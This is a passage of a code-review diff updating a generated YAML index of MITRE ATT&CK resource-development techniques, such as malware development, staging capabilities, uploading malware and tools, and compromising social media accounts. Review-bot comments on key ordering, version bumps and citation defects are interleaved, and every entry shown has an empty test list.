\n\nTypically, the resources for a link target will be an HTML page + that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) + to decide what content to serve to the user. Adversaries may clone legitimate + sites to serve as the link target, this can include cloning of login pages + of legitimate web services or organization login pages in an effort to harvest + credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: + Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September + 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) + and have the link target point to malware for download/execution by the user.\n\nAdversaries + may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, + different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) + to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). + Link shortening services can also be employed." + id: attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-27T17:53:29.106Z' + created: '2021-03-17T20:35:08.429Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on other phases of the adversary lifecycle, such as + during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), + [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious + Link](https://attack.mitre.org/techniques/T1204/001). 
+ x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] T1587.001: technique: + created: '2020-10-01T01:33:01.433Z' + modified: '2021-04-15T03:08:33.165Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0 + description: |- + Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) + + As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. + + Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) + name: Malware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1587.001 
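Review bot: the T1587.001 block re-emitted at the end of this hunk serializes its keys in the opposite order to the T1608.005 entry added just above it (`created`, `modified`, `kill_chain_phases`, `type`, `id`, `description` first and `external_references` last, versus `external_references` first for T1608.005), so the generator is not writing technique keys in a stable order and a one-line description edit shows up as a whole block deleted and re-added. Suggest having the docs generator emit technique fields in a fixed order (or sort keys) so that index.yaml diffs only contain real content changes and reviewers can see the actual edits at a glance.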
@@ -50920,30 +53902,13 @@ resource-development: description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.' url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Malware - description: |- - Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) - - As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. - - Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. 
For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) - id: attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-22T13:05:43.492Z' - created: '2020-10-01T01:33:01.433Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1588.001: technique: 
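Review bot: the only substantive changes in this hunk are in the description (the "Before compromising a victim," lead-in is dropped, and "backdoors," becomes "backdoors (including backdoored images),") together with the bump of `x_mitre_version` from '1.0' to '1.1'; everything else is the same set of fields written back in reverse order. Since that version field is what downstream consumers of the index use to notice that technique text changed, it is worth confirming that the other entries in this patch whose descriptions are also edited (T1588.001, T1588, T1583.004, T1584.004 below) carry a matching version bump: their hunks show only the `modified` timestamp changing and do not include the version line in context.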
@@ -50956,7 +53921,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Malware description: |- - Before compromising a victim, adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. + Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries). id: attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970 @@ -50964,7 +53929,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-15T20:46:54.437Z' + modified: '2021-04-15T03:14:41.582Z' created: '2020-10-01T02:06:11.499Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50998,7 +53963,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Obtain Capabilities description: |- - Before compromising a victim, adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. + Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab) @@ -51008,7 +53973,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:22:21.135Z' + modified: '2021-04-15T03:15:21.193Z' created: '2020-10-01T01:56:24.776Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -51035,7 +54000,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Server description: |- - Before compromising a victim, adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. + Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet) id: attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337 
@@ -51043,7 +54008,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-12T16:49:11.340Z' + modified: '2021-04-15T02:51:18.167Z' created: '2020-10-01T00:48:09.578Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51065,7 +54030,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Server description: |- - Before compromising a victim, adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. + Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). id: attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5 
@@ -51073,7 +54038,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-12T19:48:07.710Z' + modified: '2021-04-15T03:03:22.184Z' created: '2020-10-01T00:56:25.135Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -51102,32 +54067,30 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Social Media Accounts - description: "Before compromising a victim, adversaries may create and cultivate - social media accounts that can be used during targeting. Adversaries can create - social media accounts that can be used to build a persona to further operations. - Persona development consists of the development of public information, presence, - history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: - BlackHatRobinSage)\n\nFor operations incorporating social engineering, the - utilization of a persona on social media may be important. These personas - may be fictitious or impersonate real people. The persona may exist on a single - social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, - etc.). Establishing a persona on social media may require development of - additional documentation to make them seem real. This could include filling - out profile information, developing social networks, or incorporating photos. - \n\nOnce a persona has been developed an adversary can use it to create connections - to targets of interest. These connections may be direct or may include trying - to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) - These accounts may be leveraged during other phases of the adversary lifecycle, - such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))." + description: "Adversaries may create and cultivate social media accounts that + can be used during targeting. Adversaries can create social media accounts + that can be used to build a persona to further operations. 
Persona development + consists of the development of public information, presence, history and appropriate + affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor + operations incorporating social engineering, the utilization of a persona + on social media may be important. These personas may be fictitious or impersonate + real people. The persona may exist on a single social media site or across + multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona + \ on social media may require development of additional documentation to make + them seem real. This could include filling out profile information, developing + social networks, or incorporating photos. \n\nOnce a persona has been developed + an adversary can use it to create connections to targets of interest. These + connections may be direct or may include trying to connect through others.(Citation: + NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged + during other phases of the adversary lifecycle, such as during Initial Access + (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))." id: attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T17:58:13.557Z' + modified: '2021-04-15T03:10:35.708Z' created: '2020-10-01T01:08:41.124Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_detection: |- Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. 
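Review bot: this hunk deletes `x_mitre_data_sources: - Social media monitoring` from T1585.001 without replacing it, while the `x_mitre_detection` text that stays in context still describes monitoring social media activity; any tooling that reads index.yaml for data-source coverage loses the only data source listed for this technique (the same field is removed from T1586.001 further down). Please confirm the field was dropped in the upstream ATT&CK data rather than omitted by the generator's field list. Minor: the re-flowed description contains the continuation line `\ on social media`, which is YAML's way of preserving a double space in "persona  on social media"; harmless, but it comes from a double space in the source text rather than from this change.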
@@ -51159,20 +54122,19 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Social Media Accounts - description: "Before compromising a victim, adversaries may compromise social - media accounts that can be used during targeting. For operations incorporating - social engineering, the utilization of an online persona may be important. - Rather than creating and cultivating social media profiles (i.e. [Social Media - Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may - compromise existing social media accounts. Utilizing an existing persona may - engender a level of trust in a potential victim if they have a relationship, - or knowledge of, the compromised persona. \n\nA variety of methods exist for - compromising social media accounts, such as gathering credentials via [Phishing - for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials - from third-party sites, or by brute forcing credentials (ex: password reuse - from breach credential dumps).(Citation: AnonHBGary) Prior to compromising - social media accounts, adversaries may conduct Reconnaissance to inform decisions - about which accounts to compromise to further their operation.\n\nPersonas + description: "Adversaries may compromise social media accounts that can be used + during targeting. For operations incorporating social engineering, the utilization + of an online persona may be important. Rather than creating and cultivating + social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), + adversaries may compromise existing social media accounts. Utilizing an existing + persona may engender a level of trust in a potential victim if they have a + relationship, or knowledge of, the compromised persona. 
\n\nA variety of methods + exist for compromising social media accounts, such as gathering credentials + via [Phishing for Information](https://attack.mitre.org/techniques/T1598), + purchasing credentials from third-party sites, or by brute forcing credentials + (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior + to compromising social media accounts, adversaries may conduct Reconnaissance + to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing @@ -51187,10 +54149,8 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T17:57:43.708Z' + modified: '2021-04-15T02:59:06.872Z' created: '2020-10-01T01:18:35.535Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_detection: |- Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. 
@@ -51200,8 +54160,83 @@ resource-development: x_mitre_platforms: - PRE atomic_tests: [] + T1608: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608 + url: https://attack.mitre.org/techniques/T1608 + - source_name: Volexity Ocean Lotus November 2020 + url: https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ + description: 'Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: + Extending Cyber Espionage Operations Through Fake Websites. Retrieved November + 20, 2020.' + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: Gallagher 2015 + description: Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking + group hacked 100+ websites to use as “watering holes”. Retrieved January + 25, 2016. + url: http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + - source_name: Malwarebytes Silent Librarian October 2020 + url: https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ + description: Malwarebytes Threat Intelligence Team. (2020, October 14). Silent + Librarian APT right on schedule for 20/21 academic year. Retrieved February + 3, 2021. 
+ - source_name: Proofpoint TA407 September 2019 + url: https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian + description: 'Proofpoint Threat Insight Team. (2019, September 5). Threat + Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.' + - source_name: DigiCert Install SSL Cert + url: https://www.digicert.com/kb/ssl-certificate-installation.htm + description: DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved + April 19, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Stage Capabilities + description: |- + Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). 
Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) + + Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): + + * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) + * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) + * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) + * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) + id: attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-27T19:01:22.653Z' + created: '2021-03-17T20:04:09.331Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as initial access and post-compromise behaviors. 
+ x_mitre_platforms: + - PRE + atomic_tests: [] T1588.002: technique: + id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0 + description: |- + Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019) + + Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). + name: Tool + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1588.002 
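Review bot: the new T1608 entry carries two text defects inherited from the source data: the citation `description: Gallagher, S.. (2015, August 5).` has a doubled period, and the same citation uses curly quotes around "watering holes" in a file that is otherwise plain ASCII. Because index.yaml is generated, these should be fixed in the upstream ATT&CK content (or normalized in the generator) rather than hand-edited here, otherwise the next regeneration reintroduces them. Also note the new technique lands between T1586.001 (Social Media Accounts) and T1588.002 (Tool) with `x_mitre_is_subtechnique: false`, i.e. the section is ordered by technique name rather than by ID.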
@@ -51210,24 +54245,92 @@ resource-development: url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Tool - description: |- - Before compromising a victim, adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019) - - Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). - id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T14:46:37.477Z' + modified: '2021-04-15T03:15:20.491Z' created: '2020-10-01T02:08:33.977Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. 
Detection efforts may be focused on post-compromise phases of the adversary lifecycle. + atomic_tests: [] + T1608.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.001 + url: https://attack.mitre.org/techniques/T1608/001 + - source_name: Volexity Ocean Lotus November 2020 + url: https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ + description: 'Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: + Extending Cyber Espionage Operations Through Fake Websites. Retrieved November + 20, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Upload Malware + description: |- + Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. + + Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) + + Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). 
By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files. + id: attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-26T18:40:15.732Z' + created: '2021-03-17T20:09:13.222Z' + x_mitre_contributors: + - Kobi Haimovich, CardinalOps + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on post-compromise phases of the adversary lifecycle, + such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress + Tool Transfer](https://attack.mitre.org/techniques/T1105). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1608.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.002 + url: https://attack.mitre.org/techniques/T1608/002 + - source_name: Dell TG-3390 + description: Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, + August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved + August 18, 2018. + url: https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Upload Tool + description: |- + Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. 
Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. + + Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. + + Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. + id: attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-26T18:41:37.444Z' + created: '2021-03-17T20:31:07.828Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on post-compromise phases of the adversary lifecycle, + such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105). x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_platforms: 
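Review bot: the new T1608.001 and T1608.002 entries are PRE-platform techniques that land with `atomic_tests: []`, so the only repo-controlled line in this region is that empty list; worth confirming the CSV/Markdown index and navigator-layer generators handle a technique with no tests and `x_mitre_platforms: [PRE]` rather than emitting an empty row. The copied `description` text also carries unresolved reference tokens such as `(Citation: Volexity Ocean Lotus November 2020)` and `(Citation: Dell TG-3390)` that correspond to `source_name` values under `external_references`; if the Markdown indexes render `description`, they should resolve those tokens against `external_references` or strip them, otherwise the raw `(Citation: ...)` markers show up in the docs. The trailing `x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_platforms:` without `+` markers is just git aligning the tail of T1608.002 with the identical tail of the entry that follows; nothing to fix there.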
@@ -51248,7 +54351,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Virtual Private Server description: |- - Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. + Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease) id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795 @@ -51256,7 +54359,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T17:58:32.476Z' + modified: '2021-04-15T02:52:41.901Z' created: '2020-10-01T00:44:23.935Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
